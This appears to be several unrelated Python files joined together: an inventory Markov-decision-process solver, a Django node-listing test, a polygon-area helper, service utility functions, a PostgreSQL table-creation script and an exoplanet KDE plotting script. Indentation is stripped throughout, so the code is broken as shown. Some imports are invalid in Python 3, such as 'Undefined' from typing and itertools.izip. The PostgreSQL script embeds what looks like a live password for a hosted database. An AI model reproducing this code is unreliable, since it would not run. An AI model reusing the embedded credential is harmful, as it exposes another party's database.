print(i, round(t.total_time, 4), round(t.total_time / t_GS, 4), sep='&', end='\\\\ \n')
print(inv_mdp.iteration_counts, '\n')
print(f'VI - JAC: {norm(v_JAC - v_VI)}')
print(f'JAC - GS: {norm(v_GS - v_JAC)}')
print(f'VI - GS: {norm(v_GS - v_VI)}', '\n')
print(f'VI: ', pol_VI)
print(f'JAC: ', pol_JAC)
print(f'GS: ', pol_GS, '\n')
return inv_mdp
def alt_case(log=False):
def f(s):
return 10 * s
def c(a):
return 3 * a - 0.01 * a ** 2
def h(s):
return s
inv_reward = inventoryReward(inv_space, f, c, h, K, _lambda)
inv_mdp = infiniteTime(inv_space, inv_reward, _lambda)
v_0 = np.ones(shape=(len(S), 1))
inv_mdp._value_iteration(v_0, 0.001, improvement_method='VI')
v_VI = inv_mdp.v
pol_VI = inv_mdp.a_policy
inv_mdp._value_iteration(v_0, 0.001, improvement_method='JAC')
v_JAC = inv_mdp.v
pol_JAC = inv_mdp.a_policy
inv_mdp._value_iteration(v_0, 0.001, improvement_method='GS')
v_GS = inv_mdp.v
pol_GS = inv_mdp.a_policy
if log:
t_GS = inv_mdp.computing_times['GS'].total_time
for i, t in inv_mdp.computing_times.items():
print(i, round(t.total_time, 4), round(t.total_time / t_GS, 4), sep='&', end='\\\\ \n')
print(inv_mdp.iteration_counts, '\n')
print(f'VI - JAC: {norm(v_JAC - v_VI)}')
print(f'JAC - GS: {norm(v_GS - v_JAC)}')
print(f'VI - GS: {norm(v_GS - v_VI)}', '\n')
print(f'VI: ', pol_VI)
print(f'JAC: ', pol_JAC)
print(f'GS: ', pol_GS, '\n')
return inv_mdp
def changing_cost():
inv_mdp1 = base_case()
inv_mdp2 = alt_case()
plt.plot(inv_mdp1.S, inv_mdp1.v, label=r'$c(s)=2s$')
plt.plot(inv_mdp2.S, inv_mdp2.v, label=r'$c(s)=3s - 0.001s^2$')
plt.legend()
plt.xlabel('Estado')
plt.ylabel(r'$v^*_\lambda(s)$')
plt.show()
def cmap_plot():
fig = plt.figure(constrained_layout=True)
gs = fig.add_gridspec(1, 11)
ax = fig.add_subplot(gs[0, :10])
ax_c = fig.add_subplot(gs[0, 10:])
return fig, ax, ax_c
def _lambda_to_1(lb=0.9, ub=0.999):
cmap = cm.get_cmap('coolwarm', 256)
_Lambda = np.linspace(lb, ub, 30)
def f(s):
return 10 * s
def c(a):
return 3 * a - 0.01 * a ** 2
def h(s):
return s
MDPS = dict()
f1, ax1, ax1c = cmap_plot()
f2, ax2, ax2c = cmap_plot()
f3, ax3, ax3c = cmap_plot()
T_T = Timer('Con truco')
T_F = Timer('Sin truco')
for l in _Lambda:
print(l)
T_T.start()
inv_reward = inventoryReward(inv_space, f, c, h, K, l, lambda_e_1=True)
MDPS[l] = infiniteTime(inv_space, inv_reward, l)
MDPS[l]._value_iteration()
T_T.stop()
T_F.start()
inv_reward = inventoryReward(inv_space, f, c, h, K, l, lambda_e_1=False)
MDPS[l] = infiniteTime(inv_space, inv_reward, l)
MDPS[l]._value_iteration()
T_F.stop()
ax1.plot(MDPS[l].S, MDPS[l].v, c=cmap((l - lb) / (ub - lb)), label=r'$\lambda = $'+str(round(l, 4)))
ax2.plot(MDPS[l].S, MDPS[l].v * (1 - l), c=cmap((l - lb) / (ub - lb)), label=r'$\lambda = $'+str(round(l, 4)))
if l == lb:
c_pol = MDPS[l].a_policy
c_l = l
if MDPS[l].a_policy != c_pol:
c_u = l
i_0 = 0
for i in MDPS[l].space.S:
if c_pol[i] > 0:
i_0 = i
i_0 += 5
ax3.plot(range(i_0), list(c_pol.values())[:i_0], '-o',
c=cmap(((c_u + c_l) / 2 - lb) / (ub - lb)),
label=r'$\lambda \in$ ' + f'[{round(c_l, 3)}, {round(c_u, 3)})')
c_pol = MDPS[l].a_policy
c_l = c_u
i_0 = 0
for i in MDPS[l].space.S:
if c_pol[i] > 0:
i_0 = i
i_0 += 5
ax3.plot(range(i_0), list(c_pol.values())[:i_0], '-o',
c=cmap(((c_u + ub) / 2 - lb) / (ub - lb)),
label=r'$\lambda \in$ ' + f'[{round(c_l, 3)}, {round(ub, 3)}]')
norm = mpl.colors.Normalize(vmin=lb, vmax=ub)
mpl.colorbar.ColorbarBase(ax1c, cmap=cmap, norm=norm)
mpl.colorbar.ColorbarBase(ax2c, cmap=cmap, norm=norm)
mpl.colorbar.ColorbarBase(ax3c, cmap=cmap, norm=norm)
ax1.set_xlabel('Estados')
ax2.set_xlabel('Estados')
ax3.set_xlabel('Estados')
ax1.set_ylabel(r'$(1 - \lambda) v^*_\lambda$')
ax2.set_ylabel(r'$v^*_\lambda$')
ax3.set_ylabel('Acción')
ax3.legend()
f4, ax4 = plt.subplots()
ax4.plot(_Lambda, [MDPS[l].computing_times['GS'].total_time for l in _Lambda])
ax4.set_xlabel(r'$\lambda$')
ax4.set_ylabel(r'Tiempo de cómputo (s)')
print(f'El tiempo total que se ahorra uno es {(T_F.total_time - T_T.total_time) }, en porcentages {(T_F.total_time - T_T.total_time) / T_T.total_time}')
plt.show()
if __name__ == "__main__":
global M, A, S, K, _lambda, dem_distr, inv_space
M = 100
A = list(range(M + 1))
S = list(range(M + 1))
K = 2
_lambda = 0.9
dem_distr = poisson(mu=10)
base_case(True)
|
import json
from io import StringIO
import pytest
from django.core.management import call_command
from node.core.utils.cryptography import get_node_identifier
@pytest.mark.usefixtures('rich_blockchain')
def test_list_nodes(test_server_address, force_smart_mocked_node_client):
out = StringIO()
call_command('list_nodes', test_server_address, stdout=out)
assert json.loads(out.getvalue().rstrip('\n')) == [{
'addresses': ['http://not-existing-node-address-674898923.com:8555/'],
'fee': 4,
'identifier': '1c8e5f54a15b63a9f3d540ce505fd0799575ffeaac62ce625c917e6d915ea8bb',
}, {
'addresses': ['http://not-existing-confirmation-validator-2-address-674898923.com:8555/'],
'fee': 4,
'identifier': '5db9a262236cc148fd2adf841dbe0967e9bfe77e5e482dc7e0ef0c59d7fb56cf',
}, {
'addresses': ['http://not-existing-self-address-674898923.com:8555/', test_server_address],
'fee': 4,
'identifier': get_node_identifier(),
}, {
'addresses': ['http://not-existing-primary-validator-address-674898923.com:8555/'],
'fee': 4,
'identifier': 'b9dc49411424cce606d27eeaa8d74cb84826d8a1001d17603638b73bdc6077f1',
}, {
'addresses': ['http://not-existing-confirmation-validator-address-674898923.com:8555/'],
'fee': 4,
'identifier': 'd171de280d593efc740e4854ee2d2bd658cd1deb967eb51a02b89c6e636f46e1',
}]
@pytest.mark.django_db
def test_list_nodes_when_no_nodes(test_server_address, force_smart_mocked_node_client):
out = StringIO()
call_command('list_nodes', test_server_address, stdout=out)
assert json.loads(out.getvalue().rstrip('\n')) == []
|
from multimodal.image_analysis import ImageAnalysisCache
IMAGE_ANALYSIS_CACHE = ImageAnalysisCache.load()
|
def twoPolygons(p1, p2):
def doubleSquare(polygon):
square = 0
for i in range(len(polygon)):
a = polygon[i]
b = polygon[(i + 1) % len(polygon)]
square += a[0] * b[1] - a[1] * b[0]
return square
return doubleSquare(p1) == doubleSquare(p2)
|
from contextlib import contextmanager
import itertools
import json
import os
import signal
from typing import Dict, List, Union, Undefined, Any, Tuple
from .exceptions import AdamaError
def location_of(filename):
return os.path.dirname(os.path.abspath(filename))
def interleave(a, b):
""" '+', [1,2,3] -> [1, '+', 2, '+', 3] """
yield next(b)
for x, y in itertools.izip(itertools.cycle(a), b):
yield x
yield y
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args, **kwargs):
if self.timeout:
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.setitimer(signal.ITIMER_REAL, self.timeout, 1)
try:
return self.function(*args, **kwargs)
finally:
if self.timeout:
signal.signal(signal.SIGALRM, old)
signal.setitimer(signal.ITIMER_REAL, 0, 0)
def identifier(namespace, name, version):
return service_iden(namespace, adapter_iden(name, version))
def adapter_iden(name, version):
return '{}_v{}'.format(name, version)
def service_iden(namespace, service):
return '{}.{}'.format(namespace, service)
def namespace_of(identifier):
return identifier.split('.')[0]
@contextmanager
def chdir(directory):
old_wd = os.getcwd()
try:
os.chdir(directory)
yield
finally:
os.chdir(old_wd)
def node(role: str) -> Dict[str, Any]:
try:
with open('/serfnode/serfnodes_by_role.json') as nodes_file:
all_nodes = json.load(nodes_file)
nodes = all_nodes[role]
nodes.sort(key=lambda obj: float(obj['timestamp']))
return nodes[0]
except KeyError:
raise AdamaError('could not find node with role "{}"'.format(role))
except FileNotFoundError:
raise AdamaError('missing info from parent at "/serfnode/nodes.json"')
except ValueError:
raise AdamaError('invalid JSON object received from parent')
def location(role: str, port: int) -> Tuple[str, int]:
info = node(role)
try:
port = int(info['ports']['{}/tcp'.format(port)][0])
except KeyError:
raise AdamaError('port {}/tcp not found for role {}'
.format(port, role))
return info['service_ip'], port
|
import psycopg2
dbname = 'vvqfwreu'
user = 'vvqfwreu'
password = 'x2V1_pasp_QsYLoNKDjsAUyUyRV1WDui'
host = 'ruby.db.elephantsql.com'
pg_conn = psycopg2.connect(dbname = dbname, user = user,
password = password, host = host)
pg_curs = pg_conn.cursor()
create_table_statement = """
CREATE TABLE test_table (
Id SERIAL PRIMARY KEY,
name varchar(40) NOT NULL,
data JSONB
);
"""
pg_curs.execute(create_table_statement)
pg_conn.commit()
insert_statement = """
INSERT INTO test_table (name, data) VALUES
(
'A row name',
null
),
(
'Another row, with JSON this time',
'{ "a": 1, "b": ["dog", "cat", 42], "c": true }'::JSONB
)
"""
pg_curs.execute(insert_statement)
pg_conn.commit()
|
# To import required modules:
import numpy as np
import time
import os
import sys
import matplotlib
import matplotlib.cm as cm #for color maps
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec #for specifying plot attributes
from matplotlib import ticker #for setting contour plots to log scale
import scipy.integrate #for numerical integration
import scipy.misc #for factorial function
from scipy.special import erf #error function, used in computing CDF of normal distribution
import scipy.interpolate #for interpolation functions
from scipy.stats import gaussian_kde as KDE #for gaussian_kde functions
import corner #corner.py package for corner plots
#matplotlib.rc('text', usetex=True)
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from src.functions_general import *
from src.functions_compare_kepler import *
from src.functions_load_sims import *
from src.functions_plot_catalogs import *
from src.functions_plot_params import *
savefigures = False
loadfiles_directory = '/Users/hematthi/Documents/GradSchool/Research/ACI/Simulated_Data/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/GP_med/'
#loadfiles_directory = '../../ACI/Simulated_Data/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/GP_med/'
savefigures_directory = '/Users/hematthi/Documents/GradSchool/Research/ExoplanetsSysSim_Clusters/Figures/Model_Optimization/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/Best_models/GP_best_models/'
#savefigures_directory = '../Figures/Model_Optimization/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/Best_models/GP_best_models/'
run_number = ''
model_name = 'Clustered_P_R_Model' + run_number
compute_ratios = compute_ratios_adjacent
AD_mod = True
weights_all = load_split_stars_weights_only()
dists_include = ['delta_f',
'mult_CRPD_r',
'periods_KS',
'period_ratios_KS',
'durations_KS',
#'durations_norm_circ_KS',
#'durations_norm_circ_singles_KS',
#'durations_norm_circ_multis_KS',
'duration_ratios_nonmmr_KS',
'duration_ratios_mmr_KS',
'depths_KS',
'radius_ratios_KS',
#'radii_partitioning_KS',
#'radii_monotonicity_KS',
#'gap_complexity_KS',
]
##### To load the files with the systems with observed planets:
# To first read the number of simulated targets and bounds for the periods and radii:
N_sim, cos_factor, P_min, P_max, radii_min, radii_max = read_targets_period_radius_bounds(loadfiles_directory + 'periods%s.out' % run_number)
# To read the simulation parameters from the file:
param_vals = read_sim_params(loadfiles_directory + 'periods%s.out' % run_number)
# To load and process the observed Kepler catalog and compare with our simulated catalog:
stars_cleaned = load_Kepler_stars_cleaned()
Rstar_med = np.nanmedian(stars_cleaned['radius'])
Mstar_med = np.nanmedian(stars_cleaned['mass'])
teff_med = np.nanmedian(stars_cleaned['teff'])
#bp_rp_med = np.nanmedian(stars_cleaned['bp_rp'])
bp_rp_corr_med = np.nanmedian(stars_cleaned['bp_rp'] - stars_cleaned['e_bp_rp_interp'])
ssk_per_sys0, ssk0 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max) # combined sample
ssk_per_sys1, ssk1 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max, bp_rp_max=bp_rp_corr_med) #_max=_med
ssk_per_sys2, ssk2 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max, bp_rp_min=bp_rp_corr_med) #_min=_med
sss_per_sys0, sss0 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, compute_ratios=compute_ratios) # combined sample
sss_per_sys1, sss1 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_max=bp_rp_corr_med, compute_ratios=compute_ratios)
sss_per_sys2, sss2 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_min=bp_rp_corr_med, compute_ratios=compute_ratios)
label1, label2 = 'bluer', 'redder'
split_sss = [sss1, sss2]
split_sss_per_sys = [sss_per_sys1, sss_per_sys2]
split_ssk = [ssk1, ssk2]
split_ssk_per_sys = [ssk_per_sys1, ssk_per_sys2]
split_names = [label1, label2]
split_linestyles = ['-', '-']
split_colors = ['b', 'r']
dists0, dists_w0 = compute_distances_sim_Kepler(sss_per_sys0, sss0, ssk_per_sys0, ssk0, weights_all['all'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists1, dists_w1 = compute_distances_sim_Kepler(sss_per_sys1, sss1, ssk_per_sys1, ssk1, weights_all['bluer'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists2, dists_w2 = compute_distances_sim_Kepler(sss_per_sys2, sss2, ssk_per_sys2, ssk2, weights_all['redder'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
#'''
##### To first compute the KDE objects for each marginal distribution from Kepler:
sample_names = ['all', 'bluer', 'redder']
ssk_samples = {'all': ssk0, 'bluer': ssk1, 'redder': ssk2}
ssk_per_sys_samples = {'all': ssk_per_sys0, 'bluer': ssk_per_sys1, 'redder': ssk_per_sys2}
P_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['P_obs'])) for sample in sample_names}
Rm_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['Rm_obs'])) for sample in sample_names}
tdur_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_obs']) for sample in sample_names}
tdur_tcirc_1_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_tcirc_1_obs']) for sample in sample_names}
tdur_tcirc_2p_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_tcirc_2p_obs']) for sample in sample_names}
D_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['D_obs'])) for sample in sample_names}
radii_kde_Kep = {sample: KDE(ssk_samples[sample]['radii_obs']) for sample in sample_names}
Rstar_kde_Kep = {sample: KDE(ssk_samples[sample]['Rstar_obs']) for sample in sample_names}
D_ratio_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['D_ratio_obs'])) for sample in sample_names}
xi_Kep = {sample: np.log10(ssk_samples[sample]['xi_obs']) for sample in sample_names}
xi_kde_Kep = {sample: KDE(xi_Kep[sample][np.isfinite(xi_Kep[sample])]) for sample in sample_names}
xi_res_Kep = {sample: np.log10(ssk_samples[sample]['xi_res_obs']) for sample in sample_names}
xi_res_kde_Kep = {sample: KDE(xi_res_Kep[sample][np.isfinite(xi_res_Kep[sample])]) for sample in sample_names}
xi_nonres_Kep = {sample: np.log10(ssk_samples[sample]['xi_nonres_obs']) for sample in sample_names}
xi_nonres_kde_Kep = {sample: KDE(xi_nonres_Kep[sample][np.isfinite(xi_nonres_Kep[sample])]) for sample in sample_names}
radii_partitioning_kde_Kep = {sample: KDE(np.log10(ssk_per_sys_samples[sample]['radii_partitioning'])) for sample in sample_names}
radii_monotonicity_kde_Kep = {sample: KDE(ssk_per_sys_samples[sample]['radii_monotonicity']) for sample in sample_names}
gap_complexity_kde_Kep = {sample: KDE(ssk_per_sys_samples[sample]['gap_complexity']) for sample in sample_names}
##### To load and compute the KDE objects for a large number of models:
loadfiles_directory = '/Users/hematthi/Documents/GradSchool/Research/ACI/Simulated_Data/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/GP_best_models/'
#loadfiles_directory = '../../ACI/Simulated_Data/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/GP_best_models/'
runs = 100
param_vals_all = []
Mtot_bins = np.arange(10)-0.5
Mtot_bins_mid = (Mtot_bins[:-1] + Mtot_bins[1:])/2.
Mtot_counts_all = {sample: [] for sample in sample_names}
Mtot_normed_counts_all = {sample: [] for sample in sample_names}
P_kde_all = {sample: [] for sample in sample_names} # kde on log values
Rm_kde_all = {sample: [] for sample in sample_names} # kde on log values
tdur_kde_all = {sample: [] for sample in sample_names}
tdur_tcirc_1_kde_all = {sample: [] for sample in sample_names}
tdur_tcirc_2p_kde_all = {sample: [] for sample in sample_names}
D_kde_all = {sample: [] for sample in sample_names} # kde on log values
radii_kde_all = {sample: [] for sample in sample_names}
Rstar_kde_all = {sample: [] for sample in sample_names}
D_ratio_kde_all = {sample: [] for sample in sample_names} # kde on log values
xi_kde_all = {sample: [] for sample in sample_names}
xi_res_kde_all = {sample: [] for sample in sample_names}
xi_nonres_kde_all = {sample: [] for sample in sample_names}
radii_partitioning_kde_all = {sample: [] for sample in sample_names} # kde on log values
radii_monotonicity_kde_all = {sample: [] for sample in sample_names}
gap_complexity_kde_all = {sample: [] for sample in sample_names}
for i in range(1,runs+1): #range(1,runs+1)
run_number = i
print(i)
param_vals_i = read_sim_params(loadfiles_directory + 'periods%s.out' % run_number)
param_vals_all.append(param_vals_i)
sss_per_sys0_i, sss0_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, compute_ratios=compute_ratios) # combined sample
sss_per_sys1_i, sss1_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_max=bp_rp_corr_med, compute_ratios=compute_ratios)
sss_per_sys2_i, sss2_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_min=bp_rp_corr_med, compute_ratios=compute_ratios)
dists0_i, dists_w0_i = compute_distances_sim_Kepler(sss_per_sys0_i, sss0_i, ssk_per_sys0, ssk0, weights_all['all'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists1_i, dists_w1_i = compute_distances_sim_Kepler(sss_per_sys1_i, sss1_i, ssk_per_sys1, ssk1, weights_all['bluer'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists2_i, dists_w2_i = compute_distances_sim_Kepler(sss_per_sys2_i, sss2_i, ssk_per_sys2, ssk2, weights_all['redder'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
samples_sss_per_sys_i = {'all': sss_per_sys0_i, 'bluer': sss_per_sys1_i, 'redder': sss_per_sys2_i}
samples_sss_i = {'all': sss0_i, 'bluer': sss1_i, 'redder': sss2_i}
for sample in sample_names:
# Multiplicities:
counts, bins = np.histogram(samples_sss_per_sys_i[sample]['Mtot_obs'], bins=Mtot_bins)
Mtot_counts_all[sample].append(counts)
Mtot_normed_counts_all[sample].append(counts/float(np.sum(counts)))
# Periods:
P_kde = KDE(np.log10(samples_sss_i[sample]['P_obs']))
P_kde_all[sample].append(P_kde)
# Period ratios:
Rm_kde = KDE(np.log10(samples_sss_i[sample]['Rm_obs']))
Rm_kde_all[sample].append(Rm_kde)
# Durations:
tdur_kde = KDE(samples_sss_i[sample]['tdur_obs'])
tdur_kde_all[sample].append(tdur_kde)
# Circular normalized durations (singles and multis):
tdur_tcirc_1_kde = KDE(samples_sss_i[sample]['tdur_tcirc_1_obs'])
tdur_tcirc_2p_kde = KDE(samples_sss_i[sample]['tdur_tcirc_2p_obs'])
tdur_tcirc_1_kde_all[sample].append(tdur_tcirc_1_kde)
tdur_tcirc_2p_kde_all[sample].append(tdur_tcirc_2p_kde)
# Depths:
D_kde = KDE(np.log10(samples_sss_i[sample]['D_obs']))
D_kde_all[sample].append(D_kde)
# Planet radii:
radii_kde = KDE(samples_sss_i[sample]['radii_obs'])
radii_kde_all[sample].append(radii_kde)
# Stellar radii:
Rstar_kde = KDE(samples_sss_i[sample]['Rstar_obs'])
Rstar_kde_all[sample].append(Rstar_kde)
# Depth ratios:
D_ratio_kde = KDE(np.log10(samples_sss_i[sample]['D_ratio_obs']))
D_ratio_kde_all[sample].append(D_ratio_kde)
# Log(xi):
xi = np.log10(samples_sss_i[sample]['xi_obs'])
xi_kde = KDE(xi[np.isfinite(xi)])
xi_kde_all[sample].append(xi_kde)
# Log(xi) (res):
xi_res = np.log10(samples_sss_i[sample]['xi_res_obs'])
xi_res_kde = KDE(xi_res[np.isfinite(xi_res)])
xi_res_kde_all[sample].append(xi_res_kde)
# Log(xi) (non-res):
xi_nonres = np.log10(samples_sss_i[sample]['xi_nonres_obs'])
xi_nonres_kde = KDE(xi_nonres[np.isfinite(xi_nonres)])
xi_nonres_kde_all[sample].append(xi_nonres_kde)
# Radii partitioning:
radii_partitioning_kde = KDE(np.log10(samples_sss_per_sys_i[sample]['radii_partitioning']))
radii_partitioning_kde_all[sample].append(radii_partitioning_kde)
# Radii monotonicity:
radii_monotonicity_kde = KDE(samples_sss_per_sys_i[sample]['radii_monotonicity'])
radii_monotonicity_kde_all[sample].append(radii_monotonicity_kde)
# Gap complexity:
gap_complexity_kde = KDE(samples_sss_per_sys_i[sample]['gap_complexity'])
gap_complexity_kde_all[sample].append(gap_complexity_kde)
for sample in sample_names:
Mtot_counts_all[sample] = np.array(Mtot_counts_all[sample])
Mtot_counts_16, Mtot_counts_84 = {sample: np.zeros(len(Mtot_bins_mid)) for sample in sample_names}, {sample: np.zeros(len(Mtot_bins_mid)) for sample in sample_names}
for b in range(len(Mtot_bins_mid)):
for sample in sample_names:
counts_bin_sorted = np.sort(Mtot_counts_all[sample][:,b])
Mtot_counts_16[sample][b], Mtot_counts_84[sample][b] = counts_bin_sorted[16], counts_bin_sorted[84]
##### To plot the simulated and Kepler catalogs as KDEs:
subdirectory = 'Remake_for_PaperII/kde_lines/kNN_bw/' #'Remake_for_PaperII/kde_shaded/'
fig_size = (8,6) #(8,3) # size of each panel (figure)
fig_lbrt = [0.15, 0.15, 0.95, 0.95] #[0.15, 0.3, 0.95, 0.925]
pts = 201 # number of points to evaluate each kde
kNN_factor = 5 # len(data)/kNN_factor = k Nearest Neighbors
lw_Kep = 3 # linewidth
lw_sim = 0.1
alpha = 0.2 # transparency of histograms
afs = 20 # axes labels font size
tfs = 20 # text labels font size
lfs = 16 # legend labels font size
# Function to compute the KDE using an adaptive bandwidth (kNN):
def kde_kNN_bw(kde, x_axis, kNN_factor=5):
# Compute the KDE along an axis ('x_axis') given a KDE object ('kde') with adaptive bandwidth using k nearest neighbors (kNN), where kNN = (number of data points)/kNN_factor
kde_pts, bw_pts = np.zeros(len(x_axis)), np.zeros(len(x_axis))
x_data = kde.dataset[0]
kNN = int(np.round(len(x_data)/kNN_factor)) # number of nearest neighbors
for p,x in enumerate(x_axis):
idx_kNN = np.argsort(np.abs(x_data - x))[:kNN] # indices of kNN
x_kNN = x_data[idx_kNN] # kNN points
bw = np.max(x_kNN) - np.min(x_kNN) # bandwidth as range of kNN points
kde.set_bandwidth(bw_method=bw)
kde_pts[p] = kde(x)[0] # evaluate KDE at point
bw_pts[p] = bw
return kde_pts, bw_pts
# To make a 'plot' listing the model parameters:
fig = plt.figure(figsize=fig_size)
plot = GridSpec(1,1,left=fig_lbrt[0],bottom=fig_lbrt[1],right=fig_lbrt[2],top=fig_lbrt[3],wspace=0.1,hspace=0.1)
nrows = 8
for i,param in enumerate(param_vals):
plt.figtext(x=0.05+0.35*int(i/float(nrows)), y=0.875-0.1*(i%nrows), s=r'%s = %s' % (param_symbols[param], np.round(param_vals[param],3)), fontsize=lfs)
if savefigures == True:
plt.savefig(savefigures_directory + subdirectory + model_name + '_sim_params.pdf')
plt.close()
# Multiplicities:
plot_fig_counts_hist_simple(fig_size, [sss_per_sys['Mtot_obs'] for sss_per_sys in split_sss_per_sys], [ssk_per_sys['Mtot_obs'] for ssk_per_sys in split_ssk_per_sys], x_min=0, x_llim=0.5, normalize=False, N_sim_Kep_factor=float(N_sim)/N_Kep, log_y=True, c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ms_Kep=['x','x'], lw=1, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], xlabel_text='Observed planets per system', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
label_this = r'16% and 84%' if i==0 else None
plt.plot(Mtot_bins_mid, Mtot_counts_16[sample], drawstyle='steps-mid', color=split_colors[i], lw=1, ls='--', label=label_this)
plt.plot(Mtot_bins_mid, Mtot_counts_84[sample], drawstyle='steps-mid', color=split_colors[i], lw=1, ls='--')
plt.legend(loc='lower left', bbox_to_anchor=(0.01,0.01), ncol=1, frameon=False, fontsize=lfs) #show the legend
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_multiplicities_compare.pdf')
plt.close()
# Periods:
P_axis = np.logspace(np.log10(P_min), np.log10(P_max), pts)
ax = plot_fig_pdf_simple(fig_size, [], [], x_min=P_min, x_max=P_max, y_min=0, y_max=1, log_x=True, xticks_custom=[3,10,30,100,300], xlabel_text=r'$P$ (days)', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = Rm_kde_Kep[sample](np.log10(Rm_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(P_kde_Kep[sample], np.log10(P_axis), kNN_factor=kNN_factor)
plt.plot(P_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i], label='Kepler' if i==0 else '')
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = P_kde_all[sample][n](np.log10(P_axis))
kde_pts, bw_pts = kde_kNN_bw(P_kde_all[sample][n], np.log10(P_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(P_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i], label=r'Simulated draws' if i==0 and n==0 else '')
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(P_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha, label=r'Simulated 16-84%' if i==0 else '')
#ax.set_yscale('log')
plt.legend(loc='upper right', bbox_to_anchor=(1,1), ncol=1, frameon=False, fontsize=lfs)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_periods_compare.pdf')
plt.close()
# Period ratios (all, with some upper cut-off):
Rm_axis = np.logspace(np.log10(1.), np.log10(30.), pts)
R_max_cut = np.max(Rm_axis)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(Rm_axis), x_max=R_max_cut, y_max=5, log_x=True, xticks_custom=[1,2,3,4,5,10,20], xlabel_text=r'$\mathcal{P} = P_{i+1}/P_i$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = Rm_kde_Kep[sample](np.log10(Rm_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(Rm_kde_Kep[sample], np.log10(Rm_axis), kNN_factor=kNN_factor)
plt.plot(Rm_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = Rm_kde_all[sample][n](np.log10(Rm_axis))
kde_pts, bw_pts = kde_kNN_bw(Rm_kde_all[sample][n], np.log10(Rm_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(Rm_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(Rm_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_periodratios_compare.pdf')
plt.close()
# Transit durations:
tdur_axis = np.linspace(0., 12., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_axis), x_max=np.max(tdur_axis), y_max=0.4, xlabel_text=r'$t_{\rm dur}$ (hrs)', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_kde_Kep[sample](tdur_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_kde_Kep[sample], tdur_axis, kNN_factor=kNN_factor)
plt.plot(tdur_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_kde_all[sample][n](tdur_axis)
